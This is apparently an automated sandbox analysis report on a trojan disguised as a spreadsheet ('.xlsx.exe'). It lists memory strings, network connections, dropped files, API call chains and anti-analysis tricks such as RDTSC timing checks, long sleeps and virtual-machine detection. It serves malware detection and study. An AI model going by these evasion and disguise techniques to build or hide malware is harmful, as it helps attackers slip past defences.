      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731158586.000000000746C000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3351962992.00000000074B5000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3355352985.00000000074B7000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3513923547.00000000074B5000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3706467827.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3834655419.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3224756606.00000000074B7000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2575572170.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3382677279.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3861400825.00000000074B5000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2420547261.000000000746E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3861400825.00000000074AC000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3834777087.00000000074B5000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3677479359.00000000074AA000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.4024417346.00000000074B5000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.4024417346.00000000074AC000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3224953298.00000000074B7000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3070445267.000000000746C000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3861400825.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3198125430.00000000074B7000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3834655419.00000000074AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2884260070.00000000074AC000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3352640327.00000000074AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;repor
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3070062158.0000000007466000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731190068.000000000744C000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2884426323.0000000007454000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731158586.000000000746C000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3351962992.00000000074B5000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3355352985.00000000074B7000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3513923547.00000000074B5000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3706467827.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3834655419.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731139165.00000000074AC000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3224756606.00000000074B7000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2575572170.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3861400825.00000000074B5000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2420547261.000000000746E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3861400825.00000000074AC000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3834777087.00000000074B5000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3677479359.00000000074AA000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.4024417346.00000000074B5000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.4024417346.00000000074AC000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3510931834.00000000074AA000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3224953298.00000000074B7000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3861400825.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3198125430.00000000074B7000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3382677279.00000000074AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3070062158.0000000007466000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
      Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
      Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
      Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50030 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
      Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
      Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49993 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50029 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
      Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.6:49756 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.6:49764 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.6:49806 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.6:49888 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.6:49922 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.6:49956 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.6:49993 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.6:50027 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.6:50029 version: TLS 1.2
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeCode function: 0_2_00405331 GetDlgItem,GetDlgItem,GetDlgItem,LdrInitializeThunk,GetDlgItem,LdrInitializeThunk,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,LdrInitializeThunk,ShowWindow,LdrInitializeThunk,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,LdrInitializeThunk,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,LdrInitializeThunk,ShowWindow,LdrInitializeThunk,LdrInitializeThunk,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,LdrInitializeThunk,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405331
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeCode function: 0_2_0040335A EntryPoint,LdrInitializeThunk,#17,SetErrorMode,OleInitialize,LdrInitializeThunk,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,LdrInitializeThunk,GetTempPathW,LdrInitializeThunk,GetTempPathW,GetWindowsDirectoryW,lstrcatW,LdrInitializeThunk,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,LdrInitializeThunk,LdrInitializeThunk,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_0040335A
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeCode function: 2_2_0040335A EntryPoint,LdrInitializeThunk,#17,SetErrorMode,OleInitialize,LdrInitializeThunk,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,LdrInitializeThunk,GetTempPathW,LdrInitializeThunk,GetTempPathW,GetWindowsDirectoryW,lstrcatW,LdrInitializeThunk,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,LdrInitializeThunk,LdrInitializeThunk,GetCurrentProcess,ExitWindowsEx,ExitProcess,2_2_0040335A
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeFile created: C:\Windows\resources\0809Jump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeCode function: 0_2_00404B6E0_2_00404B6E
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeCode function: 0_2_0040659D0_2_0040659D
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeCode function: 2_2_00404B6E2_2_00404B6E
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeCode function: 2_2_0040659D2_2_0040659D
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeCode function: String function: 00402B3A appears 49 times
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamebiliousnesses.exeDVarFileInfo$ vs 09-FD-94.03.60.175.07.xlsx.exe
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamebiliousnesses.exeDVarFileInfo$ vs 09-FD-94.03.60.175.07.xlsx.exe
      Source: 09-FD-94.03.60.175.07.xlsx.exeBinary or memory string: OriginalFilenamebiliousnesses.exeDVarFileInfo$ vs 09-FD-94.03.60.175.07.xlsx.exe
      Source: 09-FD-94.03.60.175.07.xlsx.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: classification engineClassification label: mal76.troj.evad.winEXE@3/10@2/2
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeCode function: 0_2_00404635 GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,LdrInitializeThunk,MulDiv,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,SetDlgItemTextW,0_2_00404635
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeCode function: 0_2_0040206A LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,LdrInitializeThunk,0_2_0040206A
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeFile created: C:\Users\user\subacidity.lnkJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeFile created: C:\Users\user\AppData\Local\Temp\nsaD100.tmpJump to behavior
      Source: 09-FD-94.03.60.175.07.xlsx.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: 09-FD-94.03.60.175.07.xlsx.exeReversingLabs: Detection: 55%
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeFile read: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe "C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe"
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeProcess created: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe "C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe"
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeProcess created: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe "C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe"Jump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: riched20.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: usp10.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: subacidity.lnk.0.drLNK file: ..\..\Program Files (x86)\Common Files\cutline.sil
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeFile written: C:\Users\user\AppData\Local\Temp\tmc.iniJump to behavior
      Source: 09-FD-94.03.60.175.07.xlsx.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

      Data Obfuscation

      barindex
      Source: Yara matchFile source: 00000000.00000002.2290371684.0000000007D83000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.4016458454.0000000004A43000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeCode function: 0_2_004062B2 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062B2
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeCode function: 0_2_10002DE0 push eax; ret 0_2_10002E0E
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeFile created: C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeAPI/Special instruction interceptor: Address: 7F0F3C6
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeAPI/Special instruction interceptor: Address: 4BCF3C6
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeRDTSC instruction interceptor: First address: 7ECFC59 second address: 7ECFC59 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, 0BE15CA1h 0x00000008 test dh, ah 0x0000000a cmp ebx, ecx 0x0000000c jc 00007F7410DC3A30h 0x0000000e inc ebp 0x0000000f inc ebx 0x00000010 cmp ah, bh 0x00000012 rdtsc
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeRDTSC instruction interceptor: First address: 4B8FC59 second address: 4B8FC59 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, 0BE15CA1h 0x00000008 test dh, ah 0x0000000a cmp ebx, ecx 0x0000000c jc 00007F7410D9D310h 0x0000000e inc ebp 0x0000000f inc ebx 0x00000010 cmp ah, bh 0x00000012 rdtsc
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe TID: 6528Thread sleep time: -90000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeCode function: 0_2_004057D0 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,0_2_004057D0
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeCode function: 0_2_0040628B FindFirstFileW,FindClose,0_2_0040628B
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeCode function: 0_2_00402770 FindFirstFileW,0_2_00402770
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeCode function: 2_2_00402770 FindFirstFileW,2_2_00402770
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeCode function: 2_2_004057D0 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,2_2_004057D0
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeCode function: 2_2_0040628B FindFirstFileW,FindClose,2_2_0040628B
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.4024417346.0000000007420000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.4024417346.0000000007454000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2758062431.0000000007454000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731190068.0000000007454000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2884426323.0000000007454000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeAPI call chain: ExitProcess graph end nodegraph_0-4744
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeAPI call chain: ExitProcess graph end nodegraph_0-4745
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeCode function: 0_2_00402C44 LdrInitializeThunk,RegOpenKeyExW,0_2_00402C44
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeCode function: 0_2_004062B2 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062B2
